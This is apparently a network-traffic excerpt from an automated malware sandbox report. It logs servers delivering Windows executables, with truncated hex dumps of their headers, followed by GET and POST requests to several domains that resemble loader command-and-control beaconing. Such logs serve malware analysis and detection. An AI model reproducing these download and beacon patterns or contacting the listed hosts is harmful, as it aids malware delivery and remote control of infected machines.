                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 21 Jun 2023 18:24:35 GMTContent-Type: application/octet-streamContent-Length: 4531200Last-Modified: Mon, 19 Jun 2023 12:11:37 GMTConnection: keep-aliveETag: "649045f9-452400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f8 45 90 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 45 00 00 08 00 00 00 00 00 00 9e 38 45 00 00 20 00 00 00 40 45 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 45 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 38 45 00 4b 00 00 00 00 40 45 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 45 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 18 45 00 00 20 00 00 00 1a 45 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 40 45 00 00 06 00 00 00 1c 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 45 00 00 02 00 00 00 22 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 38 45 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 22 45 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 1a fb 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 18:24:03 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Mon, 19 Jun 2023 15:40:57 GMTETag: "55200-5fe7d5c5a74eb"Accept-Ranges: bytesContent-Length: 348672Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 65 ad d1 65 21 cc bf 36 21 cc bf 36 21 cc bf 36 b2 82 27 36 20 cc bf 36 4e ba 21 36 35 cc bf 36 4e ba 15 36 4e cc bf 36 4e ba 14 36 03 cc bf 36 28 b4 2c 36 22 cc bf 36 21 cc be 36 5d cc bf 36 4e ba 10 36 20 cc bf 36 4e ba 25 36 20 cc bf 36 4e ba 22 36 20 cc bf 36 52 69 63 68 21 cc bf 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 69 97 04 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 3e 01 00 00 8c 74 01 00 00 00 00 a4 52 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 75 01 00 04 00 00 fc e9 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 42 01 00 28 00 00 00 00 60 74 01 78 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 34 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be 3c 01 00 00 10 00 00 00 3e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 ef 72 01 00 50 01 00 00 fc 02 00 00 42 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 69 64 61 00 00 00 a8 16 00 00 00 40 74 01 00 18 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 fa 00 00 00 60 74 01 00 fc 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 18:24:06 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 21 Jun 2023 18:20:03 GMTETag: "b5400-5fea7d10ad77e"Accept-Ranges: bytesContent-Length: 742400Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8a dd 99 f5 ce bc f7 a6 ce bc f7 a6 ce bc f7 a6 5d f2 6f a6 cf bc f7 a6 a1 ca 69 a6 da bc f7 a6 a1 ca 5d a6 a0 bc f7 a6 a1 ca 5c a6 ec bc f7 a6 c7 c4 64 a6 cb bc f7 a6 ce bc f6 a6 b1 bc f7 a6 a1 ca 58 a6 cf bc f7 a6 a1 ca 6d a6 cf bc f7 a6 a1 ca 6a a6 cf bc f7 a6 52 69 63 68 ce bc f7 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 33 8f f2 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 40 01 00 00 8e 7a 01 00 00 00 00 1f 54 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 7b 01 00 04 00 00 d0 8f 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 43 01 00 3c 00 00 00 00 80 7a 01 88 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 36 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8e 3e 01 00 00 10 00 00 00 40 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 1e 79 01 00 50 01 00 00 2a 09 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 6f 6a 75 00 00 00 44 02 00 00 00 70 7a 01 00 04 00 00 00 6e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 e0 00 00 00 80 7a 01 00 e2 00 00 00 72 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 18:24:09 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 18:24:09 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 21 Jun 2023 18:24:47 GMTContent-Type: application/octet-streamContent-Length: 4531200Last-Modified: Mon, 19 Jun 2023 12:11:37 GMTConnection: keep-aliveETag: "649045f9-452400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f8 45 90 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1a 45 00 00 08 00 00 00 00 00 00 9e 38 45 00 00 20 00 00 00 40 45 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 45 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 38 45 00 4b 00 00 00 00 40 45 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 45 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 18 45 00 00 20 00 00 00 1a 45 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 04 00 00 00 40 45 00 00 06 00 00 00 1c 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 45 00 00 02 00 00 00 22 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 38 45 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 22 45 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 1a fb 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 21 Jun 2023 18:24:14 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Sat, 31 Jul 2021 08:44:14 GMTETag: "2600-5c86757379380"Accept-Ranges: bytesContent-Length: 9728Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b1 8e c0 9c f5 ef ae cf f5 ef ae cf f5 ef ae cf ae 87 af ce f0 ef ae cf f5 ef af cf ff ef ae cf 6f 81 a7 ce f0 ef ae cf 6f 81 ac ce f4 ef ae cf 52 69 63 68 f5 ef ae cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bc 80 04 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 12 00 00 00 12 00 00 00 00 00 00 fa 1a 00 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 3a 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 2c 02 00 00 d0 39 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 10 00 00 00 10 00 00 00 12 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 0b 00 00 00 30 00 00 00 0c 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2c 02 00 00 00 50 00 00 00 04 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: astoriaresidency.com
                Source: global trafficHTTP traffic detected: GET /tmp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shsplatform.co.uk
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xsrefr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: potunulit.org
